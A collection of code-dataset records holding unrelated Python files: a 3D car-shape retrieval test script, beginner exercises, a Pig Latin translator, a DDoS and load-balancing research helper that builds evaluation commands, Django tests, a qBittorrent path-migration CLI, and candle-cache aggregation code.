RetrievalNet(self.cfg)\n\n self.normal_tf = transform.ImageNormalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n self.size = self.cfg.data.pix_size\n self.dim = self.cfg.models.z_dim\n self.view_num = self.cfg.data.view_num\n\n self.loading(self.cfg.models.pre_trained_path)\n \n\n def loading(self, paths=None):\n if paths == None or not os.path.exists(paths): \n print('No ckpt!')\n exit(-1)\n else:\n # loading\n ckpt = jt.load(paths)\n self.retrieval_net.load_state_dict(ckpt)\n print('loading %s successfully' %(paths))\n\n\n def test_steps(self):\n # 缩小一下 model 的大小,然后再计算\n '''\n 1. 先按照 json 中的cat来分类,把同一类的聚集起来\n 2. 按照 类 来遍历,将Top1的结果保存\n 3. 根据需求,是否需要计算IoU和Haus; 如果需要这两个数字,则遍历Top1结果\n '''\n cfg = self.cfg\n self.retrieval_net.eval()\n\n # datasets for no model embeddings repeating training\n is_aug = cfg.setting.is_aug\n cfg.setting.is_aug = False\n shape_dataset = ShapeDataset(cfg=cfg)\n # shape_loader = torch.utils.data.DataLoader(dataset=shape_dataset, \\\n # batch_size=cfg.data.batch_size, shuffle=False, \\\n # drop_last=False, num_workers=cfg.data.num_workers)\n shape_loader = ShapeDataset(cfg=cfg).set_attrs(batch_size=cfg.data.batch_size, shuffle=False, num_workers=cfg.data.num_workers, drop_last=False)\n cfg.setting.is_aug = is_aug\n\n\n name_src = 'compcars'\n name_tar = 'compcars'\n roots = '../data'\n is_iou_haus = True\n roots_src = os.path.join(roots, name_src)\n roots_tar = os.path.join(roots, name_tar)\n \n\n shape_cats_list = []\n shape_inst_list = []\n shape_ebd_list = []\n pbar = tqdm.tqdm(shape_loader)\n for meta in pbar:\n with jt.no_grad():\n rendering_img = meta['rendering_img']\n cats = meta['labels']['cat']\n instances = meta['labels']['instance']\n \n rendering = rendering_img.view(-1, 1, self.size, self.size)\n rendering_ebds = self.retrieval_net.get_rendering_ebd(rendering).view(-1, self.view_num, self.dim)\n shape_cats_list += cats\n shape_inst_list += instances\n shape_ebd_list.append(rendering_ebds)\n \n shape_ebd = jt.concat(shape_ebd_list, dim=0) # num, 12, dim\n\n # test image\n json_dict = read_json(os.path.join(cfg.data.data_dir, cfg.data.test_json))\n # json_dict = json_dict[:10]\n # json_lenth = len(json_dict)\n query_transformer = transform.Compose([transform.ToTensor(), transform.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n mask_transformer = transform.Compose([transform.ToTensor(), transform.Normalize((0.5, ), (0.5, ))])\n bs = shape_ebd.shape[0]\n\n # sorted as category \n cats_dict = {}\n for items in json_dict:\n cat = items['category']\n try:\n cats_dict[cat].append(items)\n except:\n cats_dict[cat] = []\n cats_dict[cat].append(items)\n\n iou_dict = {}\n haus_dict = {}\n top1_dict = {}\n topk_dict = {}\n category_dict = {}\n record_dict = {}\n\n for cat in cats_dict.keys():\n cats_list = cats_dict[cat]\n iou_dict[cat] = [0 for i in range(len(cats_list))]\n haus_dict[cat] = [0 for i in range(len(cats_list))]\n top1_dict[cat] = [0 for i in range(len(cats_list))]\n topk_dict[cat] = [0 for i in range(len(cats_list))]\n category_dict[cat] = [0 for i in range(len(cats_list))]\n record_dict[cat] = []\n\n with jt.no_grad():\n pbar = tqdm.tqdm(cats_list) \n for i, info in enumerate(pbar):\n # info = json_dict[i]\n query_img = query_transformer(Image.open(os.path.join(cfg.data.data_dir, info['img'])))\n mask_img = mask_transformer(Image.open(os.path.join(cfg.data.data_dir, info['mask'])))\n\n query = jt.concat((query_img, mask_img), dim=0)\n query = query.unsqueeze(dim=0)\n query_ebd = self.retrieval_net.get_query_ebd(query)\n\n \n query_ebd = query_ebd.repeat(bs, 1, 1)\n _, weights = self.retrieval_net.attention_query(query_ebd, shape_ebd)\n queried_rendering_ebd = jt.nn.bmm(weights, shape_ebd)\n qr_ebd = queried_rendering_ebd\n qi_ebd = query_ebd\n prod_mat = (qi_ebd * qr_ebd).sum(dim=2)\n max_idx = prod_mat.argmax(dim=0)\n\n\n pr_cats = shape_cats_list[max_idx[0]]\n pr_inst = shape_inst_list[max_idx[0]]\n \n gt_cats = info['category']\n gt_inst = info['model'].split('/')[-2]\n \n if gt_cats == pr_cats:\n category_dict[cat][i] = 1\n\n if gt_inst == pr_inst:\n top1_dict[cat][i] = 1\n\n record_dict[cat].append((pr_cats, pr_inst, gt_cats, gt_inst))\n\n \n\n max_idx = prod_mat.view(-1).topk(dim=0, k=10)[1]\n for kk in range(10):\n pr_cats = shape_cats_list[max_idx[kk]]\n pr_inst = shape_inst_list[max_idx[kk]]\n if gt_cats == pr_cats and gt_inst == pr_inst:\n topk_dict[cat][i] = 1\n break\n \n\n # basic output: top1, top10, cats, total number\n out_info = []\n total_info = {}\n for cat in cats_dict.keys():\n length = len(top1_dict[cat])\n out_info.append('%s: top1: %d, top10: %d, cats: %d, top1_rt: %.3f, top10_rt: %.3f, cats_rt: %.3f, total num: %d\\\n ' %(cat, sum(top1_dict[cat]), sum(topk_dict[cat]), sum(category_dict[cat]),\n sum(top1_dict[cat])/length, sum(topk_dict[cat])/length, \n sum(category_dict[cat])/length, length))\n \n total_info[cat] = []\n total_info[cat].append(sum(top1_dict[cat]))\n total_info[cat].append(sum(topk_dict[cat]))\n total_info[cat].append(sum(category_dict[cat]))\n total_info[cat].append(length)\n for msg in out_info:\n print(msg)\n \n total_top1 = sum([total_info[cat][0] for cat in cats_dict.keys()])\n total_top10 = sum([total_info[cat][1] for cat in cats_dict.keys()])\n total_cats = sum([total_info[cat][2] for cat in cats_dict.keys()]) \n total_length = sum([total_info[cat][3] for cat in cats_dict.keys()]) \n print('%s: top1: %d, top10: %d, cats: %d, top1_rt: %.3f, top10_rt: %.3f, cats_rt: %.3f, total num: %d\\n\\\n ' %('[Total]', total_top1, total_top10, total_cats,\n total_top1/total_length, total_top10/total_length, \n total_cats/total_length, total_length))\n\n\n return record_dict\n if is_iou_haus:\n print('>>>>>>>>[calculating haus and iou]<<<<<<<<')\n # In order to speed up, we use multiprocessing here\n \n cal_iou_haus(record_dict, roots_src, roots_tar, iou_dict, haus_dict, cats_dict)\n\n out_info = []\n total_info = {}\n for cat in cats_dict.keys():\n length = len(iou_dict[cat])\n out_info.append('%s: haus: %.4f, iou: %.4f,\\n\\\n ' %(cat, sum(haus_dict[cat])/length, sum(iou_dict[cat])/length, length))\n \n total_info[cat] = []\n total_info[cat].append(sum(haus_dict[cat]))\n total_info[cat].append(sum(iou_dict[cat]))\n total_info[cat].append(length)\n for msg in out_info:\n print(msg)\n \n total_haus = sum([total_info[cat][0] for cat in cats_dict.keys()])\n total_iou = sum([total_info[cat][1] for cat in cats_dict.keys()])\n total_length = sum([total_info[cat][2] for cat in cats_dict.keys()]) \n print('%s: haus: %.4f, iou: %.4f: %d\\n\\\n ' %('[Total]', total_haus/total_length, \n total_iou/total_length, total_length))\n\n\n\n@contextmanager\ndef poolcontext(*args, **kwargs):\n pool = multiprocessing.Pool(*args, **kwargs)\n yield pool\n pool.terminate()\n\n\ndef func(zips):\n ki, record = zips\n name_src = 'stanfordcars'\n name_tar = 'stanfordcars'\n roots = '../data'\n roots_src = os.path.join(roots, name_src)\n roots_tar = os.path.join(roots, name_tar) \n\n # pr_cats, pr_inst, gt_cats, gt_inst = record_dict['car'][ki] \n pr_cats, pr_inst, gt_cats, gt_inst = record\n src_binvox_path = os.path.join(roots_src, 'model_std_bin128', gt_cats, '%s.binvox'%(gt_inst,))\n tar_binvox_path = os.path.join(roots_tar, 'model_std_bin128', pr_cats, '%s.binvox'%(pr_inst,))\n\n with open(src_binvox_path, 'rb') as f:\n src_bin = binvox_rw.read_as_3d_array(f).data\n \n with open(tar_binvox_path, 'rb') as f:\n tar_bin = binvox_rw.read_as_3d_array(f).data\n\n # IoU\n Iou_st = np.sum(src_bin & tar_bin) / np.sum((src_bin | tar_bin) + 1e-8)\n # Haus\n src_ptc_path = os.path.join(roots_src, 'model_std_ptc10k_npy', gt_cats, '%s.npy'%(gt_inst,))\n tar_ptc_path = os.path.join(roots_tar, 'model_std_ptc10k_npy', pr_cats, '%s.npy'%(pr_inst,))\n\n src_ptc = np.load(src_ptc_path)[:5000]\n tar_ptc = np.load(tar_ptc_path)[:5000]\n src_ptc = src_ptc/2\n tar_ptc = tar_ptc/2 \n\n Haus_st = averaged_hausdorff_distance(src_ptc, tar_ptc)\n if ki % 500 == 0:\n print(ki)\n\n return Haus_st, Iou_st \n\n\nif __name__ == '__main__':\n import yaml\n import argparse\n with open('./configs/stanfordcars.yaml', 'r') as f:\n config = yaml.load(f)\n def dict2namespace(config):\n namespace = argparse.Namespace()\n for key, value in config.items():\n if isinstance(value, dict):\n new_value = dict2namespace(value)\n else:\n new_value = value\n setattr(namespace, key, new_value)\n return namespace\n config = dict2namespace(config)\n\n\n config.models.pre_trained_path = './pre_trained/stanfordcars.pt'\n\n ret = Retrieval(config)\n record_dict = ret.test_steps()\n\n \n\n is_iou_haus = True\n if is_iou_haus:\n iou_dict = {}\n haus_dict = {}\n par_num = 20 \n for cat in record_dict.keys():\n nums = [i for i in range(len(record_dict[cat]))]\n records = [record_dict[cat][i] for i in range(len(record_dict[cat]))] \n with poolcontext(processes=par_num) as pool:\n rt = pool.map(func, zip(nums, records))\n\n # print(rt)\n iou_dict[cat] = []\n haus_dict[cat] = []\n for haus, iou in rt:\n iou_dict[cat].append(iou) \n haus_dict[cat].append(haus)\n\n \n out_info = []\n total_info = {}\n for cat in record_dict.keys():\n length = len(iou_dict[cat])\n out_info.append('%s: haus: %.4f, iou: %.4f,\\\n ' %(cat, sum(haus_dict[cat])/length, sum(iou_dict[cat])/length))\n \n total_info[cat] = []\n total_info[cat].append(sum(haus_dict[cat]))\n total_info[cat].append(sum(iou_dict[cat]))\n total_info[cat].append(length)\n for msg in out_info:\n print(msg)\n \n total_haus = sum([total_info[cat][0] for cat in record_dict.keys()])\n total_iou = sum([total_info[cat][1] for cat in record_dict.keys()])\n total_length = sum([total_info[cat][2] for cat in record_dict.keys()]) \n print('%s: haus: %.4f, iou: %.4f: %d\\n\\\n ' %('[Total]', total_haus/total_length, \n total_iou/total_length, total_length))\n # pass\n\n\n\n","sub_path":"code/RetrievalNet_test.py","file_name":"RetrievalNet_test.py","file_ext":"py","file_size_in_byte":14580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"205522868","text":"continuar = True\nwhile continuar:\n print (\"--------------------------------------------------------------\")\n print (\"\"\"\\t\\t\\tCALCULA DEZENAS \"\"\")\n print (\"\"\"\\t\\t\\t---------------\"\"\")\n\n print ()\n\n print (\"\"\"DESCRIÇÃO: Informa quantas dezenas há em um número qualquer.\"\"\")\n print ()\n print (\"\"\"SAIR: Digite S, s ou sair\"\"\")\n print (\"--------------------------------------------------------------\")\n print (\"\\n\")\n\n while True:\n numero = input(\"Digite um número: \")\n try:\n numero = abs(float(numero))\n break\n except ValueError:\n if numero in ['s', 'S', 'sair']:\n continuar = False\n break\n print (\"\\nValor invalido, por favor digite apenas números\")\n finally:\n print (\"\\n\")\n\n if not continuar:\n break\n\n aux = numero\n\n qtd_dezenas = 0\n while numero >= 10:\n qtd_dezenas +=1\n numero -=10\n\n saida = \"SAIDA: \"\n saida += str(aux) + \" tem \" + str(qtd_dezenas) + \" dezena\"\n\n if qtd_dezenas >1:\n saida += \"s\"\n\n print (saida)\n\n\nprint (\"FIM DO PROGRAMA\")\n","sub_path":"ProgramasPython/qtd_dezenas.py","file_name":"qtd_dezenas.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"28809495","text":"## PIG LATIN TRANSLATOR ##\r\n\r\n## PROJECT STRUCTURE ##\r\n\r\n# Notes: A Welcome message is displayed to the user.\r\nprint(\"\\nWelcome to the Pig Latin Translator! Here you will be able to convert any sentence into Pig Latin!\")\r\n\r\n# Notes: Creating a string by getting input from the user which will be used later and translated into Pig Latin. The strip() function is used to remove any whitespace,\r\n# and the lower() function is used to convert the entire string to lowercase\r\noriginal = input(\"\\nPlease enter the sentence you would like translated.\\nSentence: \")\r\n\r\n# Notes: Creating a list by using the split() function on the \"original\" string\r\noriginal_list = original.split()\r\n\r\n# Notes: Below I create an empty list which will store the translated words.\r\nnew_list = []\r\n\r\n# Notes: Creating a for-loop that will run through each word in original_list and translate and append it accordingly.\r\nfor word in original_list:\r\n \r\n # Notes: if-statement that will add \"yay\" to the end of words in original_sentence that start with a vowel, and append it to new_list\r\n if word[0] in \"aeiou\":\r\n new_word = word + \"yay\"\r\n new_list.append(new_word)\r\n \r\n # Notes: An else-statement that will run in the case that the word doesn't start with a vowel. Each time the loop runs, a temporary variable called vowel_position\r\n # with a 0 value is created. This will later be used to determine the index location of the first vowel in the word.\r\n else:\r\n vowel_position = 0\r\n \r\n # Notes: A for-loop that will itirate through each letter in words not starting with a vowel. For each consonant counted, the value of vowel_position is increased by 1.\r\n # This will run continuously until the loop encounters the first vowel in the word.\r\n for letter in word:\r\n if letter not in \"aeiou\":\r\n vowel_position = vowel_position + 1\r\n else:\r\n break\r\n # Notes: Temporary variables created withing the for-loop in order to create the translated word. The \"consonant\" variable saves the part of the word after the index\r\n # position of \"vowel_position, and \"the_rest saves the part of the word up until the index value of \"vowel_position\".\r\n consonant = word[:vowel_position]\r\n the_rest = word[vowel_position:]\r\n new_word = the_rest + consonant + \"ay\"\r\n new_list.append(new_word)\r\n\r\ntranslated = \" \".join(new_list)\r\n\r\nprint(translated)\r\n","sub_path":"pig_latin_translator.py","file_name":"pig_latin_translator.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"134011152","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 12 22:32:01 2020\n\n@author: kisho\n\"\"\"\n\n# 1 REVERSE THE STRING \nword = \"Kishore\" \nprint(word[::-1])\nword = \"kishore\"[::-1]\nprint(word)\n \n# 2 SWAP THE CASES \nword = \"KiSHorE\"\nprint(word.swapcase())\n\nword = \"KiSHorE\"\nname = []\nfor i in word: \n if i.isupper():\n name.append(i.lower())\n elif i.islower():\n name.append(i.upper())\n else:\n name.append(i)\ncaseword = ''.join(name)\nprint(caseword)\n\n\n# 3 count the occurance of the string \nwordy=\"kishore\"\nd = {}\nfor i in wordy:\n \n if i in d:\n \n d[i]+=1\n else:\n d[i]=1\n \nprint(d)\n\n# 4 \nfor i in range(1,51):\n print(i)\n if i %2 == 0:\n print(\"EVEN :\" ,i)\n else:\n print(\"ODD :\" ,i)\n \n\n# 5 \nfor i in range(1,51):\n if i%3 ==0 and i%5 == 0:\n print(i, \"fizz-buzz\")\n elif i %3 == 0: \n print(i , \"fizz\")\n elif i % 5 == 0:\n print(i , \"buzz\")\n\n else: \n print(i)\n \n\n# 6 \nvowels = \"aeiou\"\nword = \"accenture\"\nfor i in word: \n count = 0\n if i in vowels: \n count+=1\n print(i,count)\n\n\n# 7 \nword = \"ga24nbv2k6jg523jg2545lsfwe\"\nsum = 0\nletter = []\nfor i in word:\n if i.isdigit():\n sum = sum + int(i)\n else: \n letter.append(i)\nprint(\"Sum is :\",sum,\" Characters is : \",letter)\n\n#8 \nnumber = []\nfor i in range(1,11):\n number.append(i)\nprint(number)\nn = len(number)\nsum = 9\nfor i in range(0,n):\n for j in range(0,n):\n if(number[i]+number[j] == sum):\n print(number[i],\" \", number[j])\n\n# 9 \nw1 = \"add\"\nw2 = \"dad\"\nif(sorted(w1)==sorted(w2)):\n print(\"it is anagram\" )\nelse:\n print(\"it is not an anagram\")\n\n#10\na = 11 \nfor i in range(2,int(a/2)):\n if a%i == 0:\n print(\"its not a prime\")\n break\nelse:\n print(\"its a prime\")\n\n\n# 11 \nword = (1,2,3,4,5)\n# new = word + (6,)\n\nneww = list(word)\nneww.append(6)\nprint(tuple(neww))\n\n#12 \na = input()\nrev = a[::-1]\nif a == rev:\n print(\"it is palindrome \" )\nelse:\n print(\"it is not palindrome \")\n\n# 13 \nnum = 11\nfor i in range(0,21):\n print(num ,\" x \", i, \" = \", num*i)\n\n# 14 \n\nn1 =0\nn2 =1 \nn =0\nwhile(n<50):\n print(n)\n n = n1 +n2\n n1 = n2\n n2 = n \n \n# 15 \ns = []\nsentence = \"this-is-the-program-a-to-sort-with-hyphen\"\nfor i in sentence.split(\"-\"):\n s.append(i)\ns.sort()\nprint('-'.join(s))\n\n# 16 \nli = [1,2,3,3,3,3,4,5]\nnew = []\nfor i in li:\n if i not in new:\n new.append(i)\n \nprint(new)\n\n# 17 \nalpha = \"abcdefghijklmnopqrstuvwxyz\"\nword = \"IHFJSADFAJSDFsdnff\"\nfor c in alpha:\n if c not in word:\n print(\"it is not a pangram\")\n break;\nelse: \n print(\"it is a pangram\")\n\n# 18 \nnum = []\nfor i in range(0,5):\n v = int(input(\"Enter the integer :\"))\n num.append(v)\nnum.sort(reverse = True)\nfor i in range(0,5):\n if num[i] %2 != 0:\n print(num[i])\n break\n \n#19 \n\nr = int(input(\"Enter the radius in integer\"))\narea = 3.14*r*r\nprint(area) \n\n#20 \ndef fact(n):\n if n==0 or n==1:\n return 1\n else:\n return n* fact(n-1)\n\nprint(fact(5))\n\n\n","sub_path":"python-practice/PyAccent1.py","file_name":"PyAccent1.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"429187996","text":"a = input(\"문장을 입력하세요: \")\n\nindex = 0\nfor i in a:\n if i == '.':\n a = a[:index + 1]\n index += 1\n\nif a[0] == \"저\":\n if a[-4:] == \"합니다.\":\n a = a[3:-8]\n elif a[-4:] == \"입니다.\":\n a= a[3:-4]\nelse:\n a = a[6:-4]\n\nprint(\"이름 :\",a)\n\n\n#ㅎ노자 다시 안보고 짜보기","sub_path":"2nd_assginment2.py","file_name":"2nd_assginment2.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"429287853","text":"import json\nimport random\nimport multiprocessing\nimport pyasn\nfrom matplotlib import pyplot as plt\nfrom pytricia import PyTricia\nfrom networkx import DiGraph, Graph\nimport pandas as pd\nimport numpy as np\n\nfrom eval_ddos_utils import load_as_graph\n\n\ndef stat():\n alldf = []\n for i in range(19):\n df = pd.read_csv(\"/home/yutao/Desktop/data-dns-dsr6059\" + \"/\" + str(i) + \".csv\", dtype=str);\n alldf.append(df)\n df = pd.concat(alldf, axis=0, ignore_index=True)\n df1 = df[df['src_port'] == '53']\n df2 = df1[df1['dst'] == '144.154.222.228']\n a = np.array(df2.iplen.astype(int))\n b = a+14\n t1 = b.sum()\n print(t1/1996/(1000*1000)*8, \"Mbps\") # 0.574 Mbps\n df1iplen = df1.iplen.astype(int)\n t2 = df1iplen.sum()\n print(t2 / 1996 / (1000 * 1000) * 8, \"Mbps\") # 0.569 Mbps\n df3 = df[df['dst_port'] == '53']\n df3iplen = df3.iplen.astype(int)\n t3 = df3iplen.sum()\n print(t3 / 1996 / (1000 * 1000) * 8, \"Mbps\") # 0.002 Mbps\n df4 = df3[df3['src']=='144.154.222.228']\n\n\ndef dns_server_dist_plot():\n nameservers = pd.read_csv(\"data/nameservers.csv\", dtype=str)\n country = nameservers.columns[2]\n ip = nameservers.columns[0]\n d = nameservers[[country, ip]]\n num_list = d.groupby(country).count()[ip]\n num_list = num_list.sort_values(0,False)\n x=[]; y=[]\n for i in range(30):\n x.append(str(num_list.index[i]))\n y.append(num_list[i])\n xv = list(range(30))\n plt.bar(xv,y)\n plt.xticks(xv,x)\n plt.show()\n\n\n\ndef get_tier1_as():\n g = load_as_graph()\n ret = []\n for i in g.nodes:\n if all(adj['rel']!='cp' for adj in g.adj[i].values()):\n ret.append(i)\n return ret\n\n\ndef main1():\n import random\n c_as = 6075\n # a=\"./lb_eval.py 1 data/20181201.as-rel.txt /home/pcl/8LStudentYuHaitao/tmp/jenson/flow-stats.70min.0.csv %d > result/1-1-23.txt &\"%c_as\n # print(a)\n b = \"./lb_eval.py 4 data/20181201.as-rel.txt /home/pcl/8LStudentYuHaitao/tmp/jenson/flow-stats.70min.0.csv %d %s > result/%d-4-%d.txt\"\n\n TIER1 = [7018, 209, 3356, 3549, 4323, 3320, 3257, 4436, 286, 6830, 2914, 5511, 3491, 1239, 6453, 6762, 12956, 1299,\n 701, 702, 703, 2828, 6461]\n\n MAXITEM = 50\n ruleslist = []\n inc_sel_list = []\n\n output = []\n\n for n in range(1, 24):\n if len(inc_sel_list)==0:\n if len(TIER1)>MAXITEM:\n sel = random.sample(TIER1, MAXITEM)\n else:\n sel = TIER1\n all_set = set(TIER1)\n for item in sel:\n one_set = {item}\n inc_sel_list.append((one_set, all_set-one_set))\n else:\n old_len = len(inc_sel_list)\n while len(inc_sel_list) result/1-1-23.txt &\"%c_as\n # print(a)\n b = \"./lb_eval.py 4 data/20181201.as-rel.txt /home/pcl/8LStudentYuHaitao/tmp/jenson/flow-stats.70min.0.csv %d > result/%d.txt\"\n\n ruleslist = []\n\n df = pd.read_csv('data/multihoming_stubs_flow_stats.csv',dtype=str, header=None, names=[\"as\",\"c1\",\"c2\"])\n\n for n in range(501, 1001):\n asn = df[\"as\"][n-1]\n asn = int(asn)\n cmd = b%(asn,asn)\n target = \"result/%d.txt\"%asn\n ruleslist.append((target, cmd))\n # print(ruleslist)\n\n print(\"all:%s\"%(\" \".join(a[0] for a in ruleslist)))\n\n for target, cmd in ruleslist:\n print(\"%s:\"%target)\n print(\"\\t%s\"%cmd)\n\n\ndef main3():\n ruleslist = []\n df = pd.read_csv('data/multihoming_stubs_flow_stats.csv',dtype=str, header=None, names=[\"as\",\"c1\",\"c2\"])\n for n in range(1, 1001):\n asn = df[\"as\"][n-1]\n asn = int(asn)\n target = \"result-stability/%d.txt\" % asn\n cmd = \"python3 stability_analysis.py data/20181201.as-rel.txt %d 20 > %s\"%(asn,target)\n ruleslist.append((target, cmd))\n\n print(\"all:%s\"%(\" \".join(a[0] for a in ruleslist)))\n\n for target, cmd in ruleslist:\n print(\"%s:\"%target)\n print(\"\\t%s\"%cmd)\n\n\ndef main():\n ruleslist = []\n df = pd.read_csv('data/multihoming_stubs_flow_stats.csv',dtype=str, header=None, names=[\"as\",\"c1\",\"c2\"])\n for n in range(1, 51):\n asn = df[\"as\"][n-1]\n asn = int(asn)\n if asn==21899:\n continue\n target = \"result-lb-eval/%d.txt\" % asn\n cmd = \"python3 lb_eval_fork.py 4 data/20181201.as-rel.txt /home/pcl/8LStudentYuHaitao/tmp/jenson/flow-stats.70min.0.csv %d\"%(asn)\n ruleslist.append((target, cmd))\n\n print(\"all:%s\"%(\" \".join(a[0] for a in ruleslist)))\n\n for target, cmd in ruleslist:\n print(\"%s:\"%target)\n print(\"\\t%s\"%cmd)\n\n\n\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"eval_ddos_trial.py","file_name":"eval_ddos_trial.py","file_ext":"py","file_size_in_byte":6025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"415356328","text":"from django.urls import reverse\nfrom django.test import TestCase\n\nfrom .models import Mineral\n\n\n# Create your tests here.\nclass CourseViewsTests(TestCase):\n def setUp(self):\n self.mineral = Mineral.objects.create(\n name='Test',\n image_filename='Test',\n image_caption='Test',\n category='Test',\n formula='Test',\n strunz_classification='Test',\n crystal_system='Test',\n unit_cell='Test',\n color='Test',\n crystal_symmetry='Test',\n cleavage='Test',\n mohs_scale_hardness='Test',\n luster='Test',\n streak='Test',\n diaphaneity='Test',\n optical_properties='Test',\n group='Test',\n refractive_index='Test',\n crystal_habit='Test',\n specific_gravity='Test',\n )\n\n self.mineral2 = Mineral.objects.create(\n name='Test2',\n image_filename='Test2',\n image_caption='Test2',\n category='Test2',\n formula='Test2',\n strunz_classification='Test2',\n crystal_system='Test2',\n unit_cell='Test2',\n color='Test2',\n crystal_symmetry='Test2',\n cleavage='Test2',\n mohs_scale_hardness='Test2',\n luster='Test2',\n streak='Test2',\n diaphaneity='Test2',\n optical_properties='Test2',\n group='Test2',\n refractive_index='Test2',\n crystal_habit='Test2',\n specific_gravity='Test2',\n )\n\n def test_mineral_index_view(self):\n resp = self.client.get(reverse('minerals:index'))\n self.assertEqual(resp.status_code, 200)\n self.assertIn(self.mineral, resp.context['minerals'])\n self.assertIn(self.mineral2, resp.context['minerals'])\n self.assertTemplateUsed(resp, 'index.html')\n self.assertContains(resp, self.mineral.name)\n\n def test_mineral_detail_view(self):\n resp = self.client.get(reverse('minerals:detail',\n kwargs={'pk': self.mineral.pk}))\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(self.mineral, resp.context['mineral'])\n","sub_path":"minerals/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"402268906","text":"import logging\nimport argparse\n\nfrom . import QBTBatchMove, discover_bt_backup_path\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-e', '--existing-path', help='Existing root of path to look for.')\n parser.add_argument('-n', '--new-path', help='New root path to replace existing root path with.')\n parser.add_argument('-t', '--target-os', help='Target OS (converts slashes). '\n 'Default will auto-detect if conversion is needed '\n 'based on existing vs new.',\n choices=['Windows', 'Linux', 'Mac'])\n parser.add_argument('-b', '--bt-backup-path', help='BT_Backup Path Override. Default is %s'\n % discover_bt_backup_path())\n parser.add_argument('-s', '--skip-bad-files', help='Skips bad .fastresume files instead of exiting. '\n 'Default behavior is to exit.',\n action='store_true', default=False)\n\n parser.add_argument('-l', '--log-level', help='Log Level, Default is INFO.',\n choices=['DEBUG', 'INFO'], default='INFO')\n\n return parser.parse_args()\n\n\ndef main():\n args = parse_args()\n logging.basicConfig()\n logger.setLevel(args.log_level)\n logging.getLogger('qbt_migrate').setLevel(args.log_level)\n logging.getLogger('qbt_migrate').propagate = True\n qbm = QBTBatchMove()\n if args.bt_backup_path is not None:\n qbm.bt_backup_path = args.bt_backup_path\n else:\n bt_backup_path = input('BT_Backup Path (%s): ' % qbm.bt_backup_path)\n if bt_backup_path.strip():\n qbm.bt_backup_path = bt_backup_path\n if args.existing_path is None:\n args.existing_path = input('Existing Path: ')\n if args.new_path is None:\n args.new_path = input('New Path: ')\n if args.target_os is None:\n args.target_os = input('Target OS (Windows, Linux, Mac, Blank for auto-detect): ')\n if args.target_os.strip() and args.target_os.lower() not in ('windows', 'linux', 'mac'):\n raise ValueError('Target OS is not valid. Must be Windows, Linux, or Mac. Received: %s' % args.target_os)\n elif not args.target_os.strip():\n if '/' in args.existing_path and '\\\\' in args.new_path:\n logger.info('Auto detected target OS change. Will convert slashes to Windows.')\n args.target_os = 'windows'\n elif '\\\\' in args.existing_path and '/' in args.new_path:\n logger.info('Auto detected target OS change. Will convert slashes to Linux/Mac.')\n args.target_os = 'linux'\n else:\n args.target_os = None\n qbm.run(args.existing_path, args.new_path, args.target_os, args.skip_bad_files)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"qbt_migrate/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"615916649","text":"import datetime\nimport logging\nimport os\n\nimport pandas as pd\nfrom django.db import transaction\nfrom django.db.models import Count\nfrom django.db.models.functions import TruncDate\n\nfrom quant_candles.constants import Frequency\nfrom quant_candles.exchanges import candles_api\nfrom quant_candles.lib import (\n get_existing,\n get_min_time,\n get_next_time,\n has_timestamps,\n iter_timeframe,\n validate_data_frame,\n)\nfrom quant_candles.models import Candle, CandleCache, Symbol, TradeData\nfrom quant_candles.models.trades import upload_trade_data_to\nfrom quant_candles.utils import gettext_lazy as _\n\nlogger = logging.getLogger(__name__)\n\n\ndef convert_candle_cache_to_daily(candle: Candle):\n \"\"\"Convert candle cache, by minute or hour, to daily.\n\n * Convert, from past to present, in order.\n \"\"\"\n candle_cache = CandleCache.objects.filter(candle=candle)\n last_daily_cache = (\n candle_cache.filter(frequency=Frequency.DAY)\n .only(\"timestamp\")\n .order_by(\"-timestamp\")\n .first()\n )\n if last_daily_cache:\n hourly_or_minute_cache = candle_cache.filter(\n timestamp__lt=last_daily_cache.timestamp, frequency__lt=Frequency.DAY\n )\n unique_dates = (\n hourly_or_minute_cache.annotate(date=TruncDate(\"timestamp\"))\n .values(\"date\")\n .annotate(unique=Count(\"date\"))\n )\n if unique_dates.count() <= 1:\n timestamp_from = last_daily_cache.timestamp\n else:\n timestamp_from = (\n hourly_or_minute_cache.only(\"timestamp\").first().timestamp_from\n )\n else:\n any_cache = candle_cache.only(\"timestamp\").first()\n if any_cache:\n timestamp_from = any_cache.timestamp\n else:\n timestamp_from = None\n if timestamp_from:\n timestamp_to = candle_cache.only(\"timestamp\").last().timestamp\n for daily_ts_from, daily_ts_to in iter_timeframe(\n get_min_time(timestamp_from, value=\"1d\"),\n get_next_time(timestamp_to, value=\"1d\"),\n value=\"1d\",\n ):\n delta = daily_ts_to - daily_ts_from\n total_minutes = delta.total_seconds() / Frequency.HOUR\n if total_minutes == Frequency.DAY:\n target_cache = CandleCache.objects.filter(\n candle=candle,\n timestamp__gte=daily_ts_from,\n timestamp__lt=daily_ts_to,\n frequency__lt=Frequency.DAY,\n )\n existing = get_existing(target_cache.values(\"timestamp\", \"frequency\"))\n if has_timestamps(daily_ts_from, daily_ts_to, existing):\n with transaction.atomic():\n daily_cache, created = CandleCache.objects.get_or_create(\n candle=candle,\n 